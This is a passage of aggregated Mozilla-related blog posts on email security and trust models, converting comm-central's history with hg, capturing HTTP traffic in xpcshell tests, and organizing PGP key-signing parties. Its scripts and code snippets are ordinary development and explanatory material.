Key management, on the other hand, is a more troubling weakness. S/MIME, for example, basically works without issue if you have a certificate, but managing to get an S/MIME certificate is a daunting task (necessitated, in part, by its trust model—see how these issues all intertwine?). This is also where it's easy to say that webmail is an unsolvable problem, but on further reflection, I'm not sure I agree with that statement anymore. One solution is just storing the private key with the webmail provider (you're trusting them as an email client, after all), but it's also not impossible to imagine using phones or flash drives as keystores. Other key management factors are more difficult to solve: people who lose their private keys or key rollover create thorny issues. There is also the difficulty of managing user expectations: if I forget my password to most sites (even my email provider), I can usually get it reset somehow, but when a private key is lost, the user is totally and completely out of luck.

Of course, there is one glaring and almost completely insurmountable problem. Encrypted email fundamentally precludes certain features that we have come to take for granted. The lesser-known one is server-side search and filtration. While there exist some mechanisms to do search on encrypted text, those mechanisms rely on the fact that you can manipulate the text to change the message, destroying the integrity feature of secure email. They also tend to be fairly expensive. It's easy to just say "who needs server-side stuff?", but the contingent of people who do email on smartphones would not be happy to have to pay the transfer rates to download all the messages in their folder just to find one little email, nor the energy costs of doing it on the phone. And those who have really large folders—Fastmail has a design point of 1,000,000 in a single folder—would still prefer to not have to transfer all their mail even on desktops.

The more well-known feature that would disappear is spam filtration. Consider that 90% of all email is spam, and if you think your spam folder is too slim for that to be true, it's because your spam folder only contains messages that your email provider wasn't sure were spam. The loss of server-side spam filtering would dramatically increase the cost of spam (per my calculations, a 10% reduction in filtering efficiency would double the amount of server storage needed: if 90% of mail is spam, a filter that misses 10% of it lets through roughly one spam message for every legitimate message), and client-side spam filtering is quite literally too slow [3] and too costly (remember smartphones? Imagine having your email take 10 times as much energy and bandwidth) to be a tenable option. And privacy or anonymity tends to be an invitation to abuse (cf. Tor and Wikipedia). Proposed solutions to the spam problem are so common that there is a checklist containing most of the objections.

When you consider all of those weaknesses, it is easy to be pessimistic about the possibility of wide deployment of powerful email security solutions. The strongest future—all email is encrypted, including metadata—is probably impossible or at least woefully impractical. That said, if you weaken some of the assumptions (say, don't desire all or most traffic to be encrypted), then solutions seem possible if difficult.

This concludes my discussion of email security, at least until things change for the better. I don't have a topic for the next part in this series picked out (this part actually concludes the set I knew I wanted to discuss when I started), although OAuth and DMARC are two topics that have been bugging me enough recently to consider writing about. They also have the unfortunate side effect of being things likely to see changes in the near future, unlike most of the topics I've discussed so far. But rest assured that I will find more difficulties in the email infrastructure to write about before long!

[1] All of these numbers are crude estimates and are accurate to only an order of magnitude. To justify my choices: I assume 1 email address per Internet user (this overestimates the developing world and underestimates the developed world). The largest webmail providers have given numbers that claim to be 1 billion active accounts between them, and all of them use DKIM. S/MIME is guessed by assuming that any smartcard deployment supports S/MIME, and noting that the US Department of Defense and Estonia's digital ID project are both heavy users of such smartcards. PGP is estimated from the size of the strong set and old numbers on the reachable set from the core Web of Trust.
[2] Ever since last April, it's become impossible to mention DKIM without referring to DMARC, as a result of Yahoo's controversial DMARC policy. A proper discussion of DMARC (and why what Yahoo did was controversial) requires explaining the mail transmission architecture and spam, however, so I'll defer that to a later post. It's also possible that changes in this space could happen within the next year.
[3] According to a former GMail spam employee, if it takes you as long as three minutes to calculate reputation, the spammer wins.

Categorieën: Mozilla-nl planet

Joshua Cranmer: A unified history for comm-central

Thunderbird - za, 10/01/2015 - 18:55
Several years back, Ehsan and Jeff Muizelaar attempted to build a unified history of mozilla-central across the Mercurial era and the CVS era. Their result is now used in the gecko-dev repository. While being distracted on yet another side project, I thought that I might want to do the same for comm-central. It turns out that building a unified history for comm-central makes mozilla-central look easy: mozilla-central merely had one import from CVS. In contrast, comm-central imported twice from CVS (the calendar code came later), four times from mozilla-central (once with converted history), and imported twice from Instantbird's repository (once with converted history). Three of those conversions also involved moving paths. But I've worked through all of those issues to provide a nice snapshot of the repository [1]. And since I've been frustrated by failing to find good documentation on how this sort of process went for mozilla-central, I'll provide details on the process for comm-central.

The first step and probably the hardest is getting the CVS history in DVCS form (I use hg because I'm more comfortable with it, but there's effectively no difference between hg, git, or bzr here). There is a git version of mozilla's CVS tree available, but I've noticed after doing research that its last revision is about a month before the revision I need for Calendar's import. The documentation for how that repo was built is no longer on the web, although we eventually found a copy after I wrote this post on git.mozilla.org. I tried doing another conversion using hg convert to get CVS tags, but that rudely blew up in my face. For now, I've filed a bug on getting an official, branchy-and-tag-filled version of this repository, while using the current lack of history as a base. Calendar people will have to suffer missing a month of history.

CVS is famously hard to convert to more modern repositories, and, as I've done my research, Mozilla's CVS looks like it uses those features which make it difficult. In particular, both the calendar CVS import and the comm-central initial CVS import used a CVS tag HG_COMM_INITIAL_IMPORT. That tagging was done, on only a small portion of the tree, twice, about two months apart. Fortunately, mailnews code was never touched on CVS trunk after the import (there appears to be one commit on calendar after the tagging), so it is probably possible to salvage a repository-wide consistent tag.

The start of my script for conversion looks like this:

#!/bin/bash
set -e

WORKDIR=/tmp
HGCVS=$WORKDIR/mozilla-cvs-history
MC=/src/trunk/mozilla-central
CC=/src/trunk/comm-central
OUTPUT=$WORKDIR/full-c-c

# Bug 445146: m-c/editor/ui -> c-c/editor/ui
MC_EDITOR_IMPORT=d8064eff0a17372c50014ee305271af8e577a204
# Bug 669040: m-c/db/mork -> c-c/db/mork
MC_MORK_IMPORT=f2a50910befcf29eaa1a29dc088a8a33e64a609a
# Bug 1027241, bug 611752 m-c/security/manager/ssl/** -> c-c/mailnews/mime/src/*
MC_SMIME_IMPORT=e74c19c18f01a5340e00ecfbc44c774c9a71d11d

# Step 0: Grab the mozilla CVS history.
if [ ! -e $HGCVS ]; then
  hg clone git+https://github.com/jrmuizel/mozilla-cvs-history.git $HGCVS
fi

Since I don't want to include the changesets useless to comm-central history, I trimmed the history by using hg convert to eliminate changesets that don't change the necessary files. Most of the files are simple directory-wide changes, but S/MIME only moved a few files over, so it requires a more complex way to grab the file list. In addition, I also replaced the % in the usernames with @ that they are used to appearing in hg. The relevant code is here:

# Step 1: Trim mozilla CVS history to include only the files we are ultimately
# interested in.
cat >$WORKDIR/convert-filemap.txt <<EOF
# Revision e4f4569d451a
include directory/xpcom
include mail
include mailnews
include other-licenses/branding/thunderbird
include suite
# Revision 7c0bfdcda673
include calendar
include other-licenses/branding/sunbird
# Revision ee719a0502491fc663bda942dcfc52c0825938d3
include editor/ui
# Revision 52efa9789800829c6f0ee6a005f83ed45a250396
include db/mork/
include db/mdb/
EOF

# Add the S/MIME import files
hg -R $MC log -r "children($MC_SMIME_IMPORT)" \
  --template "{file_dels % 'include {file}\n'}" >>$WORKDIR/convert-filemap.txt

if [ ! -e $WORKDIR/convert-authormap.txt ]; then
  hg -R $HGCVS log --template "{email(author)}={sub('%', '@', email(author))}\n" \
    | sort -u > $WORKDIR/convert-authormap.txt
fi

cd $WORKDIR
hg convert $HGCVS $OUTPUT --filemap convert-filemap.txt -A convert-authormap.txt

That last command provides us the subset of the CVS history that we need for unified history. Strictly speaking, I should be pulling a specific revision, but I happen to know that there's no need to (we're cloning the only head) in this case. At this point, we now need to pull in the mozilla-central changes before we pull in comm-central. Order is key; hg convert will only apply the graft points when converting the child changeset (which it does but once), and it needs the parents to exist before it can do that. We also need to ensure that the mozilla-central graft point is included before continuing, so we do that, and then pull mozilla-central:

CC_CVS_BASE=$(hg log -R $HGCVS -r 'tip' --template '{node}')
CC_CVS_BASE=$(grep $CC_CVS_BASE $OUTPUT/.hg/shamap | cut -d' ' -f2)
MC_CVS_BASE=$(hg log -R $HGCVS -r 'gitnode(215f52d06f4260fdcca797eebd78266524ea3d2c)' --template '{node}')
MC_CVS_BASE=$(grep $MC_CVS_BASE $OUTPUT/.hg/shamap | cut -d' ' -f2)

# Okay, now we need to build the map of revisions.
cat >$WORKDIR/convert-revmap.txt <<EOF
e4f4569d451a5e0d12a6aa33ebd916f979dd8faa $CC_CVS_BASE # Thunderbird / Suite
7c0bfdcda6731e77303f3c47b01736aaa93d5534 d4b728dc9da418f8d5601ed6735e9a00ac963c4e, $CC_CVS_BASE # Calendar
9b2a99adc05e53cd4010de512f50118594756650 $MC_CVS_BASE # Mozilla graft point
ee719a0502491fc663bda942dcfc52c0825938d3 78b3d6c649f71eff41fe3f486c6cc4f4b899fd35, $MC_EDITOR_IMPORT # Editor
8cdfed92867f885fda98664395236b7829947a1d 4b5da7e5d0680c6617ec743109e6efc88ca413da, e4e612fcae9d0e5181a5543ed17f705a83a3de71 # Chat
EOF

# Next, import mozilla-central revisions
for rev in $MC_MORK_IMPORT $MC_EDITOR_IMPORT $MC_SMIME_IMPORT; do
  hg convert $MC $OUTPUT -r $rev --splicemap $WORKDIR/convert-revmap.txt \
    --filemap $WORKDIR/convert-filemap.txt
done

Some notes about all of the revision ids in the script. The splicemap requires the full 40-character SHA ids; anything less and the thing complains. I also need to specify the parents of the revisions that deleted the code for the mozilla-central import, so if you go hunting for those revisions and are surprised that they don't remove the code in question, that's why.

I mentioned complications about the merges earlier. The Mork and S/MIME import codes here moved files, so that what was db/mdb in mozilla-central became db/mork. There's no support for causing the generated splice to record these as a move, so I have to manually construct those renamings:

# We need to execute a few hg move commands due to renamings.
pushd $OUTPUT
hg update -r $(grep $MC_MORK_IMPORT .hg/shamap | cut -d' ' -f2)
(hg -R $MC log -r "children($MC_MORK_IMPORT)" \
  --template "{file_dels % 'hg mv {file} {sub(\"db/mdb\", \"db/mork\", file)}\n'}") | bash
hg commit -m 'Pseudo-changeset to move Mork files' -d '2011-08-06 17:25:21 +0200'
MC_MORK_IMPORT=$(hg log -r tip --template '{node}')

hg update -r $(grep $MC_SMIME_IMPORT .hg/shamap | cut -d' ' -f2)
(hg -R $MC log -r "children($MC_SMIME_IMPORT)" \
  --template "{file_dels % 'hg mv {file} {sub(\"security/manager/ssl\", \"mailnews/mime\", file)}\n'}") | bash
hg commit -m 'Pseudo-changeset to move S/MIME files' -d '2014-06-15 20:51:51 -0700'
MC_SMIME_IMPORT=$(hg log -r tip --template '{node}')
popd

# Echo the new move commands to the changeset conversion map.
cat >>$WORKDIR/convert-revmap.txt <<EOF
52efa9789800829c6f0ee6a005f83ed45a250396 abfd23d7c5042bc87502506c9f34c965fb9a09d1, $MC_MORK_IMPORT # Mork
50f5b5fc3f53c680dba4f237856e530e2097adfd 97253b3cca68f1c287eb5729647ba6f9a5dab08a, $MC_SMIME_IMPORT # S/MIME
EOF

Now that we have all of the graft points defined, and all of the external code ready, we can pull comm-central and do the conversion. That's not quite it, though—when we graft the S/MIME history to the original mozilla-central history, we have a small segment of abandoned converted history. A call to hg strip removes that.

# Now, import comm-central revisions that we need
hg convert $CC $OUTPUT --splicemap $WORKDIR/convert-revmap.txt
hg strip 2f69e0a3a05a

[1] I left out one of the graft points because I just didn't want to deal with it. I'll leave it as an exercise to the reader to figure out which one it was. Hint: it's the only one I didn't know about before I searched for the archive points [2].
[2] Since I wasn't sure I knew all of the graft points, I decided to try to comb through all of the changesets to figure out who imported code. It turns out that hg log -r 'adds("**")' narrows it down nicely (1667 changesets to look at instead of 17547), and using the {file_adds} template helps winnow it down more easily.

Categorieën: Mozilla-nl planet

Philipp Kewisch: Monitor all http(s) network requests using the Mozilla Platform

Thunderbird - do, 02/10/2014 - 16:38

In an xpcshell test, I recently needed a way to monitor all network requests and access both request and response data so I can save them for later use. This required a little bit of digging in Mozilla’s devtools code so I thought I’d write a short blog post about it.

This code will be used in a testcase that ensures that calendar providers in Lightning function properly. In the case of the CalDAV provider, we would need to access a real server for testing. We can’t just set up a few servers and use them for testing; it would end in an unreasonable amount of server maintenance. Given that non-local connections are not allowed when running the tests on the Mozilla build infrastructure, it wouldn’t work anyway. The solution is to create a fakeserver that is able to replay the requests in the same way. Instead of manually making the requests and figuring out how the server replies, we can use this code to quickly collect all the requests we need.

Without further delay, here is the code you have been waiting for:

/* This Source Code Form is subject to the terms of the Mozilla Public
 * License, v. 2.0. If a copy of the MPL was not distributed with this
 * file, You can obtain one at http://mozilla.org/MPL/2.0/. */

// readRequestBody() below relies on NetUtil; in an xpcshell test you can
// import it like this. Ci is the usual shorthand for Components.interfaces.
Components.utils.import("resource://gre/modules/NetUtil.jsm");
var Ci = Components.interfaces;

var allRequests = [];

/**
 * Add the following function as a request observer:
 *   Services.obs.addObserver(httpObserver, "http-on-examine-response", false);
 *
 * When done listening on requests:
 *   dump(allRequests.join("\n===\n"));            // print them
 *   dump(JSON.stringify(allRequests, null, " ")); // jsonify them
 */
function httpObserver(aSubject, aTopic, aData) {
  if (aSubject instanceof Components.interfaces.nsITraceableChannel) {
    let request = new TracedRequest(aSubject);
    request._next = aSubject.setNewListener(request);
    allRequests.push(request);
  }
}

/**
 * This is the object that represents a request/response and also collects
 * the data for it.
 *
 * @param aSubject    The channel from the response observer.
 */
function TracedRequest(aSubject) {
  let httpchannel = aSubject.QueryInterface(Components.interfaces.nsIHttpChannel);

  let self = this;
  this.requestHeaders = Object.create(null);
  httpchannel.visitRequestHeaders({
    visitHeader: function(k, v) { self.requestHeaders[k] = v; }
  });
  this.responseHeaders = Object.create(null);
  httpchannel.visitResponseHeaders({
    visitHeader: function(k, v) { self.responseHeaders[k] = v; }
  });

  this.uri = aSubject.URI.spec;
  this.method = httpchannel.requestMethod;
  this.requestBody = readRequestBody(aSubject);
  this.responseStatus = httpchannel.responseStatus;
  this.responseStatusText = httpchannel.responseStatusText;

  this._chunks = [];
}

TracedRequest.prototype = {
  uri: null,
  method: null,
  requestBody: null,
  requestHeaders: null,
  responseStatus: null,
  responseStatusText: null,
  responseHeaders: null,
  responseBody: null,

  toJSON: function() {
    let j = Object.create(null);
    for (let m of Object.keys(this)) {
      if (typeof this[m] != "function" && m[0] != "_") {
        j[m] = this[m];
      }
    }
    return j;
  },

  onStartRequest: function(aRequest, aContext) {
    this._next.onStartRequest(aRequest, aContext);
  },

  onStopRequest: function(aRequest, aContext, aStatusCode) {
    this.responseBody = this._chunks.join("");
    this._chunks = null;
    this._next.onStopRequest(aRequest, aContext, aStatusCode);
    this._next = null;
  },

  onDataAvailable: function(aRequest, aContext, aStream, aOffset, aCount) {
    // Copy the response data into a storage stream so the original listener
    // still gets an untouched stream to read from.
    let binaryInputStream = Components.classes["@mozilla.org/binaryinputstream;1"]
                                      .createInstance(Components.interfaces.nsIBinaryInputStream);
    let storageStream = Components.classes["@mozilla.org/storagestream;1"]
                                  .createInstance(Components.interfaces.nsIStorageStream);
    let outStream = Components.classes["@mozilla.org/binaryoutputstream;1"]
                              .createInstance(Components.interfaces.nsIBinaryOutputStream);

    binaryInputStream.setInputStream(aStream);
    storageStream.init(8192, aCount, null);
    outStream.setOutputStream(storageStream.getOutputStream(0));

    let data = binaryInputStream.readBytes(aCount);
    this._chunks.push(data);

    outStream.writeBytes(data, aCount);
    this._next.onDataAvailable(aRequest, aContext,
                               storageStream.newInputStream(0), aOffset, aCount);
  },

  toString: function() {
    let str = this.method + " " + this.uri + "\n";
    for (let hdr of Object.keys(this.requestHeaders)) {
      str += hdr + ": " + this.requestHeaders[hdr] + "\n";
    }
    if (this.requestBody) {
      str += "\r\n" + this.requestBody + "\n";
    }
    str += "\n" + this.responseStatus + " " + this.responseStatusText;
    if (this.responseBody) {
      str += "\r\n" + this.responseBody + "\n";
    }
    return str;
  }
};

// Taken from:
// http://hg.mozilla.org/mozilla-central/file/2399d1ae89e9/toolkit/devtools/webconsole/network-helper.js#l120
function readRequestBody(aRequest, aCharset="UTF-8") {
  let text = null;
  if (aRequest instanceof Ci.nsIUploadChannel) {
    let iStream = aRequest.uploadStream;

    let isSeekableStream = false;
    if (iStream instanceof Ci.nsISeekableStream) {
      isSeekableStream = true;
    }

    let prevOffset;
    if (isSeekableStream) {
      prevOffset = iStream.tell();
      iStream.seek(Ci.nsISeekableStream.NS_SEEK_SET, 0);
    }

    // Read data from the stream.
    try {
      let rawtext = NetUtil.readInputStreamToString(iStream, iStream.available());
      let conv = Components.classes["@mozilla.org/intl/scriptableunicodeconverter"]
                           .createInstance(Components.interfaces.nsIScriptableUnicodeConverter);
      conv.charset = aCharset;
      text = conv.ConvertToUnicode(rawtext);
    } catch (err) {
    }

    // Seek locks the file, so seek to the beginning only if necko hasn't
    // read it yet, since necko doesn't seek to 0 before reading (at least
    // not until bug 459384 is fixed).
    if (isSeekableStream && prevOffset == 0) {
      iStream.seek(Components.interfaces.nsISeekableStream.NS_SEEK_SET, 0);
    }
  }
  return text;
}


Categorieën: Mozilla-nl planet

Ludovic Hirlimann: Tips on organizing a pgp key signing party

Thunderbird - ma, 29/09/2014 - 13:03

Over the years I’ve organized or tried to organize pgp key signing parties every time I go somewhere. In the last year I’ve organized 3 that were successful (i.e. with more than 10 attendees).

1. Have a venue

I’ve tried a bunch of times to have people show up in the morning at the hotel where I was staying - that doesn’t work. Having catering at the venue is even better; it will encourage people to come from far away (or do a long-distance commute). Try to mark the path through the venue with signs (paper saying "PGP key signing party", with arrows, helps).

2. Date and time

Meeting in the evening after work works best (after 18:00 or 18:30).

Let people know how long it will take (count 1 hour per 30 participants).

3. Make people sign up

That makes people think twice before saying they will attend. It’s also an easy way for you to know how much beer/cola etc. you’ll need to provide if you cater food.

I’ve been using eventbrite to manage attendance at my last three meetings; it lets me:

  • know who is coming
  • Mass mail participants
  • have them get a calendar reminder
4. Reach out

For such a party you need people to attend so you need to reach out.

I always start with a search on biglumber.com to find the gpg users registered on that site for the area I’m visiting (see below for what I send).

Then I look for local Linux user groups / *BSD groups and send an announcement to them with:

  • date
  • venue
  • link to eventbrite and why I use it
  • ask them to forward (they know the area better than you)
  • I also use lanyrd and twitter, but I’m not convinced that they work.

For my last announcement it looked like this:

Subject: GnuPG / PGP key signing party September 26 2014

Hello my name is ludovic,

I'm a sysadmin at mozilla working remote from europe. I've been involved
with Thunderbird a lot (and still am). I'm organizing a pgp key signing
party in the Mozilla san francisco office on September the 26th 2014 from
6PM to 8PM.

For security and assurance reasons I need to count how many people will
attend. I've setup an eventbrite for that at
https://www.eventbrite.com/e/gnupg-pgp-key-signing-party-making-the-web-of-trust-stronger-tickets-12867542165
(please take one ticket if you think about attending - if you change your
mind, cancel so more people can come).

I will use the eventbrite tool to send reminders and I will try to make a
list with keys and fingerprints before the event to make things more
manageable (but I don't promise).

For those using lanyrd you will be able to use http://lanyrd.com/ccckzw.

Ludovic

ps: sent to buug.org, nblug.org and penlug.org - please feel free to post
where appropriate (the more the merrier, the stronger the web of trust).
ps2: I have contacted people listed on biglumber to have more gpg related
people show up.

--
[:Usul] MOC Team at Mozilla
QA Lead for Thunderbird
http://sietch-tabr.tumblr.com/ - http://weusepgp.info/

5. Make it easy to attend

As noted above, making a list of participants to hand out helps a lot (I’ve used http://www.phildev.net/pius/ and my own stuff to make a list). It makes things easier for you and for attendees. Tell people what they need to bring (IDs, a pen, printed fingerprints if you don’t provide a list).

6. Send reminders

Send people reminders and let them know how many people intend to show up. It boosts attendance.

Categorieën: Mozilla-nl planet

Ludovic Hirlimann: Gnupg / PGP key signing party in mozilla's San francisco space

Thunderbird - wo, 17/09/2014 - 02:35

I’m organizing a pgp Keysigning party in the Mozilla san francisco office on September the 26th 2014 from 6PM to 8PM.

For security and assurance reasons I need to count how many people will attend. I’ve set up an eventbrite for that at https://www.eventbrite.com/e/gnupg-pgp-key-signing-party-making-the-web-of-trust-stronger-tickets-12867542165 (please take one ticket if you think about attending - if you change your mind, cancel so more people can come).

I will use the eventbrite tool to send reminders and I will try to make a list with keys and fingerprint before the event to make things more manageable (but I don’t promise).

For those using lanyrd you will be able to use http://lanyrd.com/ccckzw. (Please tweet the event to get more people in.)

Categorieën: Mozilla-nl planet

Joshua Cranmer: Why email is hard, part 7: email security and trust

Thunderbird - wo, 06/08/2014 - 05:39
This post is part 7 of an intermittent series exploring the difficulties of writing an email client. Part 1 describes a brief history of the infrastructure. Part 2 discusses internationalization. Part 3 discusses MIME. Part 4 discusses email addresses. Part 5 discusses the more general problem of email headers. Part 6 discusses how email security works in practice. This part discusses the problem of trust.

At a technical level, S/MIME and PGP (or at least PGP/MIME) use cryptography essentially identically. Yet the two are treated as radically different models of email security because they diverge on the most important question of public key cryptography: how do you trust the identity of a public key? Trust is critical, as it is the only way to stop an active, man-in-the-middle (MITM) attack. MITM attacks are actually easier to pull off in email, since all email messages effectively have to pass through both the sender's and the recipients' email servers [1], allowing attackers to pull off permanent, long-lasting MITM attacks [2].

S/MIME uses the same trust model that SSL uses, based on X.509 certificates and certificate authorities. X.509 certificates effectively work by providing a certificate that says who you are which is signed by another authority. In the original concept (as you might guess from the name "X.509"), the trusted authority was your telecom provider, and the certificates were furthermore intended to be a part of the global X.500 directory—a natural extension of the OSI internet model. The OSI model of the internet never gained traction, and the trusted telecom providers were replaced with trusted root CAs.

PGP, by contrast, uses a trust model that's generally known as the Web of Trust. Every user has a PGP key (containing their identity and their public key), and users can sign others' public keys. Trust generally flows from these signatures: if you trust a user, you know the keys that they sign are correct. The name "Web of Trust" comes from the vision that trust flows along the paths of signatures, building a tight web of trust.

And now for the controversial part of the post, the comparisons and critiques of these trust models. A disclaimer: I am not a security expert, although I am a programmer who revels in dreaming up arcane edge cases. I also don't use PGP at all, and use S/MIME to a very limited extent for some Mozilla work [3], although I did try a few abortive attempts to dogfood it in the past. I've attempted to replace personal experience with comprehensive research [4], but most existing critiques and comparisons of these two trust models are about 10-15 years old and predate several changes to CA certificate practices.

A basic tenet of development that I have found is that the average user is fairly ignorant. At the same time, a lot of the defense of trust models, both CAs and Web of Trust, tends to hinge on configurability. How many people, for example, know how to add or remove a CA root from Firefox, Windows, or Android? Even among the subgroup of Mozilla developers, I suspect the number of people who know how to do so are rather few. Or in the case of PGP, how many people know how to change the maximum path length? Or even understand the security implications of doing so?

Seen in the light of ignorant users, the Web of Trust is a UX disaster. Its entire security model is predicated on having users precisely specify how much they trust other people to trust others (ultimate, full, marginal, none, unknown) and also on having them continually do out-of-band verification procedures and publicly reporting those steps. In 1998, a seminal paper on the usability of a GUI for PGP encryption came to the conclusion that the UI was effectively unusable for users, to the point that only a third of the users were able to send an encrypted email (and even then, only with significant help from the test administrators), and a quarter managed to publicly announce their private keys at some point, which is pretty much the worst thing you can do. They also noted that the complex trust UI was never used by participants, although the failure of many users to get that far makes generalization dangerous [5]. While newer versions of security UI have undoubtedly fixed many of the original issues found (in no small part due to the paper, one of the first to argue that usability is integral, not orthogonal, to security), I have yet to find an actual study on the usability of the trust model itself.

The Web of Trust has other faults. The notion of "marginal" trust it turns out is rather broken: if you marginally trust a user who has two keys who both signed another person's key, that's the same as fully trusting a user with one key who signed that key. There are several proposals for different trust formulas [6], but none of them have caught on in practice to my knowledge.

A hidden fault is associated with its manner of presentation: in sharp contrast to CAs, the Web of Trust appears to not delegate trust, but any practical widespread deployment needs to solve the problem of contacting people who have had no prior contact. Combined with the need to bootstrap new users, this implies that there needs to be some keys that have signed a lot of other keys that are essentially default-trusted—in other words, a CA, a fact sometimes lost on advocates of the Web of Trust.

That said, a valid point in favor of the Web of Trust is that it more easily allows people to distrust CAs if they wish to. While I'm skeptical of its utility to a broader audience, the ability to do so is crucial for a not-insignificant portion of the population, and it's important enough to be explicitly called out.

X.509 certificates are most commonly discussed in the context of SSL/TLS connections, so I'll discuss them in that context as well, as the implications for S/MIME are mostly the same. Almost all criticism of this trust model essentially boils down to a single complaint: certificate authorities aren't trustworthy. A historical criticism is that the addition of CAs to the main root trust stores was ad-hoc. Since then, however, the main oligopoly of these root stores (Microsoft, Apple, Google, and Mozilla) have made their policies public and clear [7]. The introduction of the CA/Browser Forum in 2005, with a collection of major CAs and the major browsers as members, helps in articulating common policies [8]. These policies, simplified immensely, boil down to:

  1. You must verify information (depending on certificate type). This information must be relatively recent.
  2. You must not use weak algorithms in your certificates (e.g., no MD5).
  3. You must not make certificates that are valid for too long.
  4. You must maintain revocation checking services.
  5. You must have fairly stringent physical and digital security practices and intrusion detection mechanisms.
  6. You must be [externally] audited every year that you follow the above rules.
  7. If you screw up, we can kick you out.

I'm not going to claim that this is necessarily the best policy or even that any policy can feasibly stop intrusions from happening. But it's a policy, so CAs must abide by some set of rules.

Another CA criticism is the fear that they may be suborned by national government spy agencies. I find this claim underwhelming, considering that the number of certificates acquired by intrusions that were used in the wild is larger than the number of certificates acquired by national governments that were used in the wild: 1 and 0, respectively. Yet no one complains about the untrustworthiness of CAs due to their ability to be hacked by outsiders. Another attack is that CAs are controlled by profit-seeking corporations, which misses the point because the business of CAs is not selling certificates but selling their access to the root databases. As we will see shortly, jeopardizing that access is a great way for a CA to go out of business.

To understand issues involving CAs in greater detail, two CAs are particularly useful to look at. The first is CACert. CACert is favored by many for its attempt to handle X.509 certificates in a Web of Trust model, so invariably every public discussion about CACert ends up devolving into an attack on other CAs for their perceived capture by national governments or corporate interests. Yet what many proponents of CACert's inclusion miss (or dismiss) is the fact that CACert actually failed the required audit, and it is unlikely ever to pass one. This shows a central failure mode of both CAs and the Web of Trust: different people have different definitions of "trust," and in the case of CACert, some people favor a subjective definition (I trust the operators because they're not evil) even though an objective definition fails (in this case, that the root signing key is securely kept).

The other CA of note here is DigiNotar. In July 2011, hackers managed to acquire fraudulent certificates by breaking into DigiNotar's systems. By late August, people had become aware of these certificates being used in practice [9] to intercept communications, mostly in Iran. The use appears to have been caught by Chromium's built-in key pinning for Google sites, which flagged the fraudulent certificate. After it became clear that the fraudulent certificates were not limited to a single fake Google certificate, and that DigiNotar had failed to notify potentially affected companies of its breach, DigiNotar was swiftly removed from all of the trust databases. It declared bankruptcy within two weeks.

The DigiNotar affair demonstrates several things. One, SSL MITM attacks are not merely theoretical (I saw at least two or three security experts advising, pre-DigiNotar, that SSL MITM attacks were "theoretical" and therefore the wrong target for security mechanisms). Two, keeping the trust of browsers is necessary for the commercial operation of a CA. Three, the notion that a CA is "too big to fail" is false: DigiNotar played an important role in the Dutch community as a major CA and as an operator of the Dutch government's Staat der Nederlanden certificate hierarchy, yet when it screwed up and lost that trust, it was swiftly kicked out despite this role. I suspect that even Verisign could be kicked out if it managed to screw up badly enough.

This isn't to say that the CA model isn't problematic. But the source of its problems is that delegating trust isn't a feasible model in the first place, a problem it shares with the Web of Trust. Different notions of what "trust" actually means, and the uncertainty introduced as chains of trust grow longer, make delegated trust weak to both social-engineering and technical attacks. There appears to be an increasing consensus that the best way forward is some variant of key pinning, much akin to how SSH works: once you know someone's public key, you complain if that public key appears to change, even if the new one appears to be "trusted." This does leave people open to attacks on first use, and the question of what to do when you need to legitimately re-key is not easy to solve.
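
To make the SSH analogy concrete, here is a minimal sketch of trust-on-first-use (TOFU) pinning against a TLS server. The pin-store path and JSON format are my own illustrative choices rather than any real tool's, and a real implementation would also need the re-keying escape hatch just mentioned.

    # A minimal sketch of SSH-style trust-on-first-use certificate pinning.
    # The pin-store location and format are illustrative assumptions.
    import hashlib, json, os, socket, ssl

    PIN_STORE = os.path.expanduser("~/.cert_pins.json")  # hypothetical store

    def fetch_fingerprint(host, port=443):
        # CA validation is deliberately disabled: under pinning, the remembered
        # key, not the CA chain, is the root of trust.
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        with socket.create_connection((host, port)) as sock:
            with ctx.wrap_socket(sock, server_hostname=host) as tls:
                der = tls.getpeercert(binary_form=True)
        return hashlib.sha256(der).hexdigest()

    def check_pin(host):
        pins = json.load(open(PIN_STORE)) if os.path.exists(PIN_STORE) else {}
        seen = fetch_fingerprint(host)
        if host not in pins:
            pins[host] = seen  # first use: the unavoidable leap of faith
            with open(PIN_STORE, "w") as f:
                json.dump(pins, f)
        elif pins[host] != seen:
            # Either a legitimate re-key or a MITM; deciding which is the
            # hard problem noted above.
            raise ssl.SSLError("pinned certificate for %s changed" % host)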

In short, both CAs and the Web of Trust have issues. Whether you should prefer S/MIME or PGP ultimately comes down to the very conscious question of how you want to deal with trust—a question without a clear, obvious answer. If I appear to be painting CAs and S/MIME in a positive light and the Web of Trust and PGP in a negative one in this post, it is because I am deliberately taking the less common positions, to balance the perspectives usually found on the internet. In my next post, I'll round out the discussion of email security by explaining why it has seen such poor uptake and by answering the question of which email security protocol is most popular. The answer may surprise you!

[1] Strictly speaking, you can bypass the sender's SMTP server. In practice, this is considered a hole in the SMTP system that email providers are trying to plug.
[2] I've had 13 different connections to the internet in the time I've had my main email address, not counting all the public wifis I have used. Whereas an attacker would find it extraordinarily difficult to intercept all of my SSH sessions for a MITM attack, intercepting all of my email sessions is far easier if the attacker were my email provider.
[3] Before you read too much into this personal choice of S/MIME over PGP, it's entirely motivated by a simple concern: S/MIME is built into Thunderbird; PGP is not. As someone who does a lot of Thunderbird development work that could easily break the Enigmail extension locally, needing to use an extension would be disruptive to my workflow.
[4] This is not to say that I don't heavily research many of my other posts, but for this one I went so far as to actually start going through a lot of published journals in an attempt to find information.
[5] It's questionable how well the usability of a trust model UI can be measured in a lab setting, since the observer effect is particularly strong for all metrics of trust.
[6] The web of trust makes a nice graph, and graphs invite lots of interesting mathematical metrics. I've always been partial to eigenvector-based metrics, myself (see the sketch after these footnotes).
[7] Mozilla's policy for addition to NSS is basically the standard policy adopted by all open-source Linux or BSD distributions, seeing as OpenSSL never attempted to produce a root database.
[8] It looks to me as if the browsers are more in charge in this forum than the CAs.
[9] To my knowledge, this was the first—and so far only—use of a mis-issued certificate to actively MITM SSL connections in the wild.
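
As a coda to footnote [6]: here is a toy illustration of an eigenvector-style trust metric, computed by plain power iteration over a made-up key-signing graph. The graph, and the idea that signature weight should flow along its edges this way, are purely illustrative.

    # A toy eigenvector-style score over a made-up key-signing graph,
    # computed by power iteration; no external libraries needed.
    signatures = {  # edges: who signed whose key (all names invented)
        "alice": ["bob", "carol"],
        "bob":   ["alice"],
        "carol": ["alice", "bob"],
        "dave":  ["carol"],
    }
    keys = sorted(signatures)
    index = {k: i for i, k in enumerate(keys)}

    score = [1.0] * len(keys)
    for _ in range(50):
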